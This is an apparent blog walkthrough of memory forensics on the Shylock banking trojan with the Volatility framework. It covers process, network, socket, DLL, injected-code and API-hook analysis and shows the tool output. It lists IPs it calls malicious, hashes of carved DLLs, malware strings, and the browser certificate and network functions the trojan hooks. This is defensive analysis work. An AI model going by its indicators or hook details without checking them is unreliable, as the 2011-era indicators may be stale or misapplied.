Shylock via volatility

Shylock is a new Financial Malware, publicly reported for the first time on 7 September 2011. Additional informations on can be checked out from Mila’s blogpost http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html

Tools

Essay

Memory Acquisition

First step is the Memory Acquisition that can be accomplished essentially in two ways, depending essentially by the environment you are dealing with. First basical categorization could be:

  • Virtual Environment.
  • Physical Environment.

In the first case (depending on the Virtual Machine Software used) we could Acquire the memory by taking the corresponding memory file, like:

Vmware -> *.vmem

or by dumping with proper tools the Memory. The tools approach is also used in case of a Physical Environment. Let’s see some of these tools

Image Analysis

Once we have our memory dump, the second step is to identify the nature of the dump we have.

# python vol.py imageinfo -f infected.dmp

Volatile Systems Volatility Framework 2.1_alpha
Suggested Profile(s) : WinXPSP3x86, WinXPSP2x86 (Instantiated with WinXPSP2x86)
AS Layer1 : JKIA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/../infected.dmp)
PAE type : No PAE
DTB : 0x39000
KDBG : 0x8054c760L
KPCR : 0xffdff000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2011-09-28 11:59:02
Image local date and time : 2011-09-28 11:59:02
Number of Processors : 1
Image Type :

We have a Windows XP with ServicePack 2 on x86 environment.

Acquiring informations about the image and consequently the OS, is a task that shouln’t be never undervalued, cause we could gain precious hints on how to handle certain Artifacts.

Let’s assume the case of network analysis plugins that are OS dependant:

  • connscan -> XP Only
  • netscan -> Vista, 2008 or Windows 7

Process Analysis

Volatility offers various ways of process enumeration, the first one is pslist

# python vol.py pslist -f infected.dmp

Volatile Systems Volatility Framework 2.1_alpha
Offset(V) Name PID PPID Thds Hnds Time
---------- -------------------- ------ ------ ------ ------ -------------------
0x80eed020 System 4 0 54 258 1970-01-01 00:00:00
0xffb6d020 smss.exe 368 4 3 21 2011-09-28 11:56:51
0xffb5a3b8 csrss.exe 584 368 10 408 2011-09-28 11:56:52
0x80dd8c78 winlogon.exe 608 368 21 444 2011-09-28 11:56:52
0xffb37550 services.exe 652 608 16 259 2011-09-28 11:56:53
0xffb3bca8 lsass.exe 664 608 23 344 2011-09-28 11:56:53
0x80dacda0 VBoxService.exe 832 652 8 107 2011-09-28 11:56:53
0x80d826c8 svchost.exe 876 652 20 198 2011-09-28 11:56:53
0xffb50998 svchost.exe 960 652 9 222 2011-09-28 11:56:54
0x80e05020 svchost.exe 1052 652 68 1116 2011-09-28 11:56:54
0xffb64668 svchost.exe 1116 652 7 84 2011-09-28 11:56:55
0xffb74578 svchost.exe 1188 652 15 205 2011-09-28 11:56:55
0xffa6eda0 explorer.exe 1440 1400 26 499 2011-09-28 11:56:57
0x80d24a80 spoolsv.exe 1588 652 14 116 2011-09-28 11:56:57
0xffa79020 VBoxTray.exe 1672 1440 6 82 2011-09-28 11:56:58
0xffa7e6d8 ctfmon.exe 1680 1440 1 81 2011-09-28 11:56:58
0xffb4b790 alg.exe 1276 652 7 103 2011-09-28 11:57:11
0xffb8ebb8 wscntfy.exe 1372 1052 1 53 2011-09-28 11:57:12
0xffbbcda0 wuauclt.exe 220 1052 7 173 2011-09-28 11:57:55
0x80d4b1a8 firefox.exe 1336 1440 35 466 2011-09-28 11:58:52

Process Enumeration in this case does not give us elements that can evidence an infection, there another good plugin psxview that it’s used for more in depth inspection (finds hidden processes with various process listings) but in this case we don’t have process artifacts.

Network Activity

# python vol.py connscan -f infected.dmp

Volatile Systems Volatility Framework 2.1_alpha
Offset(P) Local Address Remote Address Pid
---------- ------------------------- ------------------------- ------
0x010f54e8 10.0.2.15:1058 63.245.209.93:80 1336
0x0111ea48 127.0.0.1:1051 127.0.0.1:1050 1336
0x0112f008 10.0.2.15:1057 63.245.209.93:80 1336
0x01132008 10.0.2.15:1060 213.92.11.90:80 1336
0x01137008 10.0.2.15:1059 213.92.11.90:80 1336
0x01139008 10.0.2.15:1049 209.190.4.82:443 1336
0x01141008 10.0.2.15:1053 63.245.209.165:443 1336
0x01c4f008 10.0.2.15:1057 63.245.209.93:80 1336
0x03c93008 127.0.0.1:1046 127.0.0.1:1047 1336
0x03df1a30 127.0.0.1:1050 127.0.0.1:1051 1336
0x03df2900 10.0.2.15:1045 209.190.4.82:443 1440
0x0508e008 10.0.2.15:1061 209.190.4.82:443 1440
0x09394008 10.0.2.15:1056 184.173.252.203:443 1336
0x0ae3a300 127.0.0.1:1047 127.0.0.1:1046 1336

As you can see, network activity is performed mainly by PID 1336(firefox) and two entries bt PID 1440 ( explorer.exe )

Here comes the first suspect, it’s unnatural that explorer.exe process produces Network traffic.

Next step obviously is to check IP Reputation, a quick search lead us to discover that 209.190.4.82 is malicious.

Is this enough ?

No, by keeping in mind that often malware makes use of browser process to exfiltrate, let’s check firefox involved IPs.

First IP 63.245.209.93 is a well known one, belongs to firefox itself.

  • 213.92.11.90 -> Clean.
  • 184.173.252.203 -> Malicious.

This implies that also Firefox is affected by some malicious activity.

We are in presence of Shylock, more details here:

http://www.threatexpert.com/report.aspx?md5=7e609f34a7541a3e2f7c8e5aed955ff2

Timeline Analysis

Precious informations can be gained from the Timeline Analysis, that involves in building a set of Cross-References based on:

  • Catching the Time of an Event ( Start / End )
  • Linking the Event to another one with similar Characteristics

First evidences of infection comes out from network connections, this could be the first direction to follow.

Volatility has a plugin called sockets that prints out a list of open sockets. Let’s give a global to the sockets:

# python vol.py sockets -f infected.dmp

Volatile Systems Volatility Framework 2.1_alpha
Offset(V) PID Port Proto Address Create Time
---------- ------ ------ ------------------- -------------- --------------------------
0xffbab2f0 1052 123 17 UDP 10.0.2.15 2011-09-28 11:57:10
0xffbbf650 664 500 17 UDP 0.0.0.0 2011-09-28 11:57:06
0xffb32e98 4 445 6 TCP 0.0.0.0 2011-09-28 11:56:51
0xffb66220 960 135 6 TCP 0.0.0.0 2011-09-28 11:56:54
0x80d35d08 258 37927 855 - 0.0.0.0 1970-01-01 00:00:00
0xffba77a0 1188 1900 17 UDP 10.0.2.15 2011-09-28 11:57:11
0x80d32b78 4 139 6 TCP 10.0.2.15 2011-09-28 11:56:59
0x80d32b78 1336 1047 6 TCP 0.0.0.0 2011-09-28 11:58:53
0x80e2b3b8 1116 1052 17 UDP 0.0.0.0 2011-09-28 11:58:55
0x80e2de98 1052 123 17 UDP 127.0.0.1 2011-09-28 11:57:10
0xffbabe70 664 0 255 Reserved 0.0.0.0 2011-09-28 11:57:06
0x80e23e98 1336 1051 6 TCP 0.0.0.0 2011-09-28 11:58:55
0x80e23e98 1116 1025 17 UDP 0.0.0.0 2011-09-28 11:57:04
0x80d37650 4 137 17 UDP 10.0.2.15 2011-09-28 11:56:59
0x80e22da0 1336 1056 6 TCP 0.0.0.0 2011-09-28 11:58:57
0x80e32a70 1336 1046 6 TCP 127.0.0.1 2011-09-28 11:58:53
0x80e32a70 1336 1060 6 TCP 0.0.0.0 2011-09-28 11:59:02
0xffb86e98 1188 1900 17 UDP 127.0.0.1 2011-09-28 11:57:11
0x80e14e98 1336 1050 6 TCP 127.0.0.1 2011-09-28 11:58:55
0x80e14e98 664 4500 17 UDP 0.0.0.0 2011-09-28 11:57:06
0xffb33978 4 445 17 UDP 0.0.0.0 2011-09-28 11:56:51
0xffb33978 4 138 17 UDP 10.0.2.15 2011-09-28 11:56:59
0xffa078e0 1276 1031 6 TCP 127.0.0.1 2011-09-28 11:57:11
0xffa078e0 1440 1045 6 TCP 0.0.0.0 2011-09-28 11:58:04
0x80e23220 1336 1049 6 TCP 0.0.0.0 2011-09-28 11:58:54

Due to the fact that we are interested only in certain processes:

# python vol.py sockets -f infected.dmp | grep 1440

Volatile Systems Volatility Framework 2.1_alpha
Offset(V) PID Port Proto Address Create Time
---------- ------ ------ ------------------- -------------- --------------------------
0xffa078e0 1440 1045 6 TCP 0.0.0.0 2011-09-28 11:58:04

We gain an additional information, socket in explorer.exe appeared at 11:58:04

Next entry, as you can see belongs to pid 1336 (firefox) and port 1049.

0x80e23220 1336 1049 6 TCP 0.0.0.0 2011-09-28 11:58:54

Time here is 11:58:54 so after explorer.exe socket creation. According to connscan we have also another malicious IP, that can be distinguished by the port number 1056, searching through opened sockets we have:

0x80e22da0 1336 1056 6 TCP 0.0.0.0 2011-09-28 11:58:57

So that 11:58:57.

Lower malicious timing is given by explorer’s socket, “immediately” after occurs the activity of Firefox.

This observation could profile a classical Malware Behavior, the malicious executable Injects code into explorer’s process and successively some piece of code it’s injected into the browser process.

Dll Inspection

Enumerating DLLs loaded by a process, could give some useful hint about the genuinity of a process. Here the list of explorer loaded dlls.

# python vol.py dlllist -f infected.dmp -p 1440
Volatile Systems Volatility Framework 2.1_alpha
************************************************************************
explorer.exe pid: 1440
Command line : C:\WINDOWS\Explorer.EXE
Service Pack 2

Base Size Path
0x01000000 0x0ff000 C:\WINDOWS\Explorer.EXE
0x7c910000 0x0b6000 C:\WINDOWS\system32\ntdll.dll
0x7c800000 0x0ff000 C:\WINDOWS\system32\kernel32.dll
0x77be0000 0x058000 C:\WINDOWS\system32\msvcrt.dll
0x77f40000 0x0ab000 C:\WINDOWS\system32\ADVAPI32.dll
0x77da0000 0x091000 C:\WINDOWS\system32\RPCRT4.dll
0x77e40000 0x046000 C:\WINDOWS\system32\GDI32.dll
0x77d10000 0x090000 C:\WINDOWS\system32\USER32.dll
0x77e90000 0x076000 C:\WINDOWS\system32\SHLWAPI.dll
0x7c9d0000 0x81b000 C:\WINDOWS\system32\SHELL32.dll
0x774b0000 0x13c000 C:\WINDOWS\system32\ole32.dll
0x770f0000 0x08c000 C:\WINDOWS\system32\OLEAUT32.dll
0x75f30000 0x0fc000 C:\WINDOWS\system32\BROWSEUI.dll
0x77730000 0x16c000 C:\WINDOWS\system32\SHDOCVW.dll
0x77a50000 0x095000 C:\WINDOWS\system32\CRYPT32.dll
0x77af0000 0x012000 C:\WINDOWS\system32\MSASN1.dll
0x76890000 0x083000 C:\WINDOWS\system32\CRYPTUI.dll
0x76bf0000 0x02e000 C:\WINDOWS\system32\WINTRUST.dll
0x76c50000 0x028000 C:\WINDOWS\system32\IMAGEHLP.dll
0x5bc70000 0x054000 C:\WINDOWS\system32\NETAPI32.dll
0x77180000 0x0a7000 C:\WINDOWS\system32\WININET.dll
0x76f20000 0x02d000 C:\WINDOWS\system32\WLDAP32.dll
0x77bd0000 0x008000 C:\WINDOWS\system32\VERSION.dll
0x5b180000 0x038000 C:\WINDOWS\system32\UxTheme.dll
0x5cf90000 0x026000 C:\WINDOWS\system32\ShimEng.dll
0x596b0000 0x1ca000 C:\WINDOWS\AppPatch\AcGenral.DLL
0x76b00000 0x02e000 C:\WINDOWS\system32\WINMM.dll
0x77bb0000 0x015000 C:\WINDOWS\system32\MSACM32.dll
0x76980000 0x0b4000 C:\WINDOWS\system32\USERENV.dll
0x773a0000 0x102000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2180_x-ww_a84f1ff9\comctl32.dll
0x5d4d0000 0x097000 C:\WINDOWS\system32\comctl32.dll
0x77b10000 0x022000 C:\WINDOWS\system32\appHelp.dll
0x76f90000 0x07f000 C:\WINDOWS\system32\CLBCATQ.DLL
0x77010000 0x0d2000 C:\WINDOWS\system32\COMRes.dll
0x779f0000 0x055000 C:\WINDOWS\System32\cscui.dll
0x765b0000 0x01d000 C:\WINDOWS\System32\CSCDLL.dll
0x5ba40000 0x072000 C:\WINDOWS\System32\themeui.dll
0x77f10000 0x011000 C:\WINDOWS\System32\Secur32.dll
0x76330000 0x005000 C:\WINDOWS\System32\MSIMG32.dll
0x20000000 0x2d5000 C:\WINDOWS\system32\xpsp2res.dll
0x71cd0000 0x01c000 C:\WINDOWS\System32\actxprxy.dll
0x60060000 0x033000 C:\WINDOWS\System32\msutb.dll
0x746b0000 0x04b000 C:\WINDOWS\System32\MSCTF.dll
0x71b80000 0x013000 C:\WINDOWS\system32\SAMLIB.dll
0x778f0000 0x0f7000 C:\WINDOWS\system32\SETUPAPI.dll
0x77230000 0x09d000 C:\WINDOWS\system32\urlmon.dll
0x763b0000 0x1a9000 C:\WINDOWS\system32\NETSHELL.dll
0x76e40000 0x00e000 C:\WINDOWS\system32\rtutils.dll
0x76bc0000 0x02e000 C:\WINDOWS\system32\credui.dll
0x71a30000 0x017000 C:\WINDOWS\system32\WS2_32.dll
0x71a20000 0x008000 C:\WINDOWS\system32\WS2HELP.dll
0x76ae0000 0x011000 C:\WINDOWS\system32\ATL.DLL
0x76d20000 0x019000 C:\WINDOWS\system32\iphlpapi.dll
0x71aa0000 0x012000 C:\WINDOWS\system32\MPR.dll
0x10000000 0x0b7000 C:\WINDOWS\System32\VBoxMRXNP.dll
0x75f10000 0x007000 C:\WINDOWS\System32\drprov.dll
0x71ba0000 0x00e000 C:\WINDOWS\System32\ntlanman.dll
0x71c60000 0x017000 C:\WINDOWS\System32\NETUI0.dll
0x71c20000 0x040000 C:\WINDOWS\System32\NETUI1.dll
0x71c10000 0x007000 C:\WINDOWS\System32\NETRAP.dll
0x75f20000 0x009000 C:\WINDOWS\System32\davclnt.dll
0x76310000 0x010000 C:\WINDOWS\system32\WINSTA.dll
0x74ac0000 0x047000 C:\WINDOWS\System32\webcheck.dll
0x71a50000 0x00a000 C:\WINDOWS\System32\WSOCK32.dll
0x761e0000 0x021000 C:\WINDOWS\System32\stobject.dll
0x74a80000 0x00a000 C:\WINDOWS\System32\BatMeter.dll
0x74a60000 0x008000 C:\WINDOWS\System32\POWRPROF.dll
0x76f10000 0x008000 C:\WINDOWS\System32\WTSAPI32.dll
0x72c90000 0x009000 C:\WINDOWS\system32\wdmaud.drv
0x72c80000 0x008000 C:\WINDOWS\system32\msacm32.drv
0x77ba0000 0x007000 C:\WINDOWS\system32\midimap.dll
0x0ffd0000 0x028000 C:\WINDOWS\system32\rsaenh.dll
0x76bb0000 0x00b000 C:\WINDOWS\system32\Psapi.dll
0x76ea0000 0x03c000 C:\WINDOWS\system32\RASAPI32.DLL
0x76e50000 0x012000 C:\WINDOWS\system32\rasman.dll
0x76e70000 0x02f000 C:\WINDOWS\system32\TAPI32.dll
0x767b0000 0x027000 C:\WINDOWS\system32\schannel.dll
0x719d0000 0x040000 C:\WINDOWS\System32\mswsock.dll
0x76ee0000 0x027000 C:\WINDOWS\system32\DNSAPI.dll
0x76f80000 0x006000 C:\WINDOWS\system32\rasadhlp.dll
0x66750000 0x058000 C:\WINDOWS\system32\hnetcfg.dll
0x71a10000 0x008000 C:\WINDOWS\System32\wshtcpip.dll
0x68100000 0x024000 C:\WINDOWS\system32\dssenh.dll
0x76590000 0x013000 C:\WINDOWS\system32\cryptnet.dll
0x4d530000 0x058000 C:\WINDOWS\system32\WINHTTP.dll
0x72240000 0x005000 C:\WINDOWS\system32\SensApi.dll
0x750e0000 0x014000 C:\WINDOWS\system32\Cabinet.dll
0x76940000 0x008000 C:\WINDOWS\system32\LINKINFO.dll
0x76950000 0x026000 C:\WINDOWS\system32\ntshrui.dll

Between the various entries, there are some that looks suspicious

  • WINHTTP.dll
  • DNSAPI.dll
  • cryptnet.dll
  • hnetcfg.dll
  • wshtcpip.dll

explorer.exe normally does not need networking modules like winhttp or cryptonet, so this should raise some suspect.

Finding Injected Code

According to previous informations we can move on looking for Injected code into explorer.exe

Here comes of great help, one of the most handy Volatility plugins, malfind

# python vol.py malfind -f infected.dmp -p 1440 -D /home/.../injected_code/
Volatile Systems Volatility Framework 2.1_alpha
Name Pid Start End Tag Hits Protect
explorer.exe 1440 0x01820000 0x18abfff0 VadS 0 PAGE_EXECUTE_READWRITE
Dumped to: /home/.../injected_code/explorer.exe.9d8bda0.01820000-018abfff.dmp
0x01820000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x01820010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0x01820020 00 00 00 00 00 00 00 00 00 00 60 01 00 66 08 00 ..........`..f..
0x01820030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................
0x01820040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th
0x01820050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno
0x01820060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS
0x01820070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......

explorer.exe 1440 0x01d30000 0x1dbbfff0 VadS 0 PAGE_EXECUTE_READWRITE
Dumped to: /home/.../injected_code/explorer.exe.9d8bda0.01d30000-01dbbfff.dmp
0x01d30000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ..............
0x01d30010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0x01d30020 00 00 00 00 00 00 00 00 00 00 bd 01 00 66 08 00 .............f..
0x01d30030 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 ................
0x01d30040 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 ........!..L.!Th
0x01d30050 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f is program canno
0x01d30060 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 t be run in DOS
0x01d30070 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 mode....$.......

Great! malfind catched and carved for us two executables.

# file explorer.exe.9d8bda0.01820000-018abfff.dmp
explorer.exe.9d8bda0.01820000-018abfff.dmp: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

# file explorer.exe.9d8bda0.01d30000-01dbbfff.dmp
explorer.exe.9d8bda0.01d30000-01dbbfff.dmp: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit

We have two DLLs.

# md5sum explorer.exe.9d8bda0.01820000-018abfff.dmp
2eb2380efe9c3a5db32a9adba55834b9 explorer.exe.9d8bda0.01820000-018abfff.dmp

and

# md5sum explorer.exe.9d8bda0.01d30000-01dbbfff.dmp
b29d99b940b8a62464032ddbf395f0d8 explorer.exe.9d8bda0.01d30000-01dbbfff.dmp

despite the same length the two DLLs are different.

Here some interesting string from the carved executable.

*Install=>::pGUID=%s bResult=%u Inst.m_strStarterFullName=%s
***ERROR::Wininet::HttpAllowUnauthorityCertificate::InternetSetOption GetLastError=%d
..
Bad size of the file of a inject.
Bad signature of the file of a inject.
Bad control sum of the file of a inject.
..
****************** Injects received MASTER ******************
****************** Injects received SLAVE ******************
..
EX_Hook::CreateProcessA ApplicationName=%s
EX_Hook::CreateProcessA CommandLine=%s
EX_Hook::CreateProcessA lCurrentDirectory=%s
EX_Hook::CreateProcessA Module:%s
EX_Hook::CreateProcessW ApplicationName=%ws
EX_Hook::CreateProcessW CommandLine=%ws
EX_Hook::CreateProcessW lCurrentDirectory=%ws
EX_Hook::CreateProcessW Module:%s

In addition to these strings, there are two groups of strings very explicit, that can add details to the puzzle, here a selection of them:

First Group

FF::PR_ReadHook entry
FF::ReqIsRequest FOUND fd=%08X m_isBotInfo=%u m_isInject=%u m_isContentTextXml=%u
FF::PR_WriteHook entry
FF::PR_CloseHook
FF::CERT_VerifyCertNameHook entry
FF::CERT_VerifyCertNowHook entry
FF_Hook::CERT_VerifyCertNamePtr=%08X

As should be clear, these hooks belongs to Firefox Browser.

Second Group

IE_Hook::GetReplayInfo entry
IE::ReqFindRequest FOUND hOpenRequest=%08X m_hRequestFake=%u m_isBotInfo=%u m_isInject=%u m_isContentTextXml=%u
IE::InternetReadFile
IE::InternetReadFileExA
IE::InternetReadFileExW
HttpOpenRequestA hook FAIL
HttpOpenRequestW hook FAIL
HttpSendRequestA hook FAIL
HttpSendRequestW hook FAIL
InternetReadFile
InternetReadFile hook FAIL
InternetReadFileExA hook FAIL
InternetQueryDataAvailable hook FAIL
InternetSetStatusCallback hook FAIL

According to the strings Shylock targets Internet Explorer too, additionally we have a list of hooked functions.

VAD Overview

According to malfind, we have two portions of memory that hosts malicious code

Name Pid Start End Tag Hits Protect
explorer.exe 1440 0x01820000 0x18abfff0 VadS 0 PAGE_EXECUTE_READWRITE
explorer.exe 1440 0x01d30000 0x1dbbfff0 VadS 0 PAGE_EXECUTE_READWRITE

Both blocks of code have the classical and ideal Memory Protection PAGE_EXECUTE_READWRITE that allows a piece of code to Run and Write Itself (for example in case of layered encrypted code)

Additional informations can be taken by inspecting the VAD.

VadS tag corresponds to _MMVAD_SHORT, that’s the only structure (others are Long and Short) that does not contain the CONTROL_AREA structure.

More informations about VAD are reported here: [www.dfrws.org/2007/proceedings/p62-dolan-gavitt_pres.pdf]

For our scopes it’s important to specify that Code Injection via WriteProcessMemory/VirtualAllocEx produces as evidence a VadS tag.

# python vol.py vadinfo -f infected.dmp -p 1440

VAD node @80e1ea48 Start 01820000 End 018abfff Tag VadS
Flags: MemCommit, PrivateMemory
Commit Charge: 140 Protection: 6
..
VAD node @ffa63a68 Start 01d30000 End 01dbbfff Tag VadS
Flags: MemCommit, PrivateMemory
Commit Charge: 140 Protection: 6

Revealing Hooks

In this paragraph we will see two different Memory Dumps that belongs to two different samples of Shylock. This because in some cases (probably given by earlier Shylock versions) explorer.exe hook list is not complete.

Hooks can be easly detected via apihooks plugin.

First Case

These are the APIs hooked by previously analyzed sample.

# python vol.py apihooks -f infected.dmp -p 1440

Volatile Systems Volatility Framework 2.1_alpha
Name Type Target Value
explorer.exe[1440]@stobject.dll iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440] eat user32.dll!ExitWindowsEx[0x184e56aL] 0x0 0x184e56a (UNKNOWN)
explorer.exe[1440] eat user32.dll!GetMessageW[0x184e6f5L] 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440]@credui.dll iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440]@msacm32.drv iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440]@netshell.dll iat USER32.dll!ExitWindowsEx 0x0 0x184e56a (UNKNOWN)
explorer.exe[1440]@netshell.dll iat USER32.dll!GetMessageW 0x0 0x184e6f5 (UNKNOWN)
explorer.exe[1440] inline ws2_32.dll!WSAGetLastError[0x71a394dcL] 0x71a394dc JMP [0x71a311b4] =>> 0x7c920331

Second Case

Reproduced infection with a different sample.

# python vol.py apihooks -f 2_infected.dmp -p 1480

Name Type Target Value
explorer.exe[1480]@rtutils.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@cscdll.dll iat ntdll.dll!NtQueryDirectoryFile 0x0 0x1baeac4 (UNKNOWN)
explorer.exe[1480]@wldap32.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@stobject.dll iat USER32.dll!GetMessageW 0x0 0x1bbde79 (UNKNOWN)
explorer.exe[1480]@vboxmrxnp.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480] eat user32.dll!0xe2[0x1bbde22L] 0x0 0x1bbde22 (UNKNOWN)
explorer.exe[1480] eat user32.dll!0x13f[0x1bbde79L] 0x0 0x1bbde79 (UNKNOWN)
explorer.exe[1480]@rarext.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@iphlpapi.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@msctf.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@msctf.dll iat KERNEL32.dll!CreateProcessA 0x0 0x1bae702 (UNKNOWN)
explorer.exe[1480]@msctf.dll iat USER32.dll!GetMessageW 0x0 0x1bbde79 (UNKNOWN)
explorer.exe[1480] eat ntdll.dll!NtEnumerateValueKey[0x1baf04cL] 0x0 0x1baf04c (UNKNOWN)
explorer.exe[1480] eat ntdll.dll!NtQueryDirectoryFile[0x1baeac4L] 0x0 0x1baeac4 (UNKNOWN)
explorer.exe[1480] eat ntdll.dll!ZwEnumerateValueKey[0x1baf04cL] 0x0 0x1baf04c (UNKNOWN)
explorer.exe[1480] eat ntdll.dll!ZwQueryDirectoryFile[0x1baeac4L] 0x0 0x1baeac4 (UNKNOWN)
explorer.exe[1480]@ws2help.dll iat ntdll.dll!NtQueryDirectoryFile 0x0 0x1baeac4 (UNKNOWN)
explorer.exe[1480]@ws2_32.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@imagehlp.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@themeui.dll iat KERNEL32.dll!CreateProcessW 0x0 0x1bae747 (UNKNOWN)
explorer.exe[1480]@themeui.dll iat USER32.dll!GetMessageW 0x0 0x1bbde79 (UNKNOWN)
explorer.exe[1480]@netshell.dll iat KERNEL32.dll!HeapDestroy 0x0 0x1bae653 (UNKNOWN)
explorer.exe[1480]@netshell.dll iat USER32.dll!ExitWindowsEx 0x0 0x1bbde22 (UNKNOWN)
explorer.exe[1480]@netshell.dll iat USER32.dll!GetMessageW 0x0 0x1bbde79 (UNKNOWN)

Firefox Hooks

# python vol.py apihooks -f 2_infected.dmp -p 1156
Name Type Target Value
firefox.exe[1156]@shlwapi.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156] inline shlwapi.dll!0x4f[0x77ea28cdL] 0x77ea28cd JMP [0x77e91468] =>> 0x10dde79 (UNKNOWN)
firefox.exe[1156]@ssl3.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@ssl3.dll iat nss3.dll!CERT_VerifyCertName 0x0 0x10d5eb0 (UNKNOWN)
firefox.exe[1156]@ssl3.dll iat nss3.dll!CERT_VerifyCertNow 0x0 0x10d5ece (UNKNOWN)
firefox.exe[1156]@xul.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@xul.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@xul.dll iat nspr4.dll!PR_Write 0x0 0x10d5cee (UNKNOWN)
firefox.exe[1156]@xul.dll iat nspr4.dll!PR_Read 0x0 0x10d504b (UNKNOWN)
firefox.exe[1156]@xul.dll iat nss3.dll!CERT_VerifyCertName 0x0 0x10d5eb0 (UNKNOWN)
firefox.exe[1156]@xul.dll iat nss3.dll!CERT_VerifyCertNow 0x0 0x10d5ece (UNKNOWN)
firefox.exe[1156]@freebl3.dll iat nspr4.dll!PR_Read 0x0 0x10d504b (UNKNOWN)
firefox.exe[1156]@freebl3.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@uxtheme.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@oleaut32.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@browsercomps.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@browsercomps.dll iat nspr4.dll!PR_Read 0x0 0x10d504b (UNKNOWN)
firefox.exe[1156] eat user32.dll!ExitWindowsEx[0x10dde22L] 0x0 0x10dde22 (UNKNOWN)
firefox.exe[1156] eat user32.dll!GetMessageW[0x10dde79L] 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156] inline ntdll.dll!LdrLoadDll[0x7c9261caL] 0x7c9261ca JMP 0x401410 (firefox.exe)
firefox.exe[1156]@nss3.dll iat nspr4.dll!PR_Write 0x0 0x10d5cee (UNKNOWN)
firefox.exe[1156]@nss3.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156] eat nss3.dll!CERT_VerifyCertName[0x10d5eb0L] 0x0 0x10d5eb0 (UNKNOWN)
firefox.exe[1156] eat nss3.dll!CERT_VerifyCertNow[0x10d5eceL] 0x0 0x10d5ece (UNKNOWN)
firefox.exe[1156] eat nspr4.dll!PR_Close[0x10d5e72L] 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156] eat nspr4.dll!PR_Read[0x10d504bL] 0x0 0x10d504b (UNKNOWN)
firefox.exe[1156] eat nspr4.dll!PR_Write[0x10d5ceeL] 0x0 0x10d5cee (UNKNOWN)
firefox.exe[1156]@ole32.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@comctl32.dll iat USER32.dll!GetMessageW 0x0 0x10dde79 (UNKNOWN)
firefox.exe[1156]@nssdbm3.dll iat nspr4.dll!PR_Close 0x0 0x10d5e72 (UNKNOWN)
firefox.exe[1156]@nssdbm3.dll iat nspr4.dll!PR_Write 0x0 0x10d5cee (UNKNOWN)
firefox.exe[1156]@nssdbm3.dll iat nspr4.dll!PR_Read 0x0 0x10d504b (UNKNOWN)

Firefox Memory

Due to the fact that Shylock is basically a Banking Trojan and according to the previously seen artifacts, would be good to inspect its target, firefox. We can dump whole memory that belongs to firefox in this way:

# python vol.py memdump -f infected.dmp -p 1336 -D /home/../memdumps/
Volatile Systems Volatility Framework 2.1_alpha
************************************************************************
Writing firefox.exe [ 1336] to 1336.dmp

Let’s carve strings

# strings 1336.dmp >> ff_strings.txt

Here some string that clearly indicates the presence of the infection

Bad size of the file of a inject.
Bad signature of the file of a inject.
Bad control sum of the file of a inject.

By disassembling the carved dll from explorer, emerged also a dll name hijackdll.dll the same string could be found in the firefox memory.

Since we are dealing with a Banking trojan would be good to look for ‘bank’, here the results:

r*censored*.co.uk
id="bodycontent"
 style="display: none;"
yHsf
</body>
<TABLE*summary="Categorised details of Transactions"
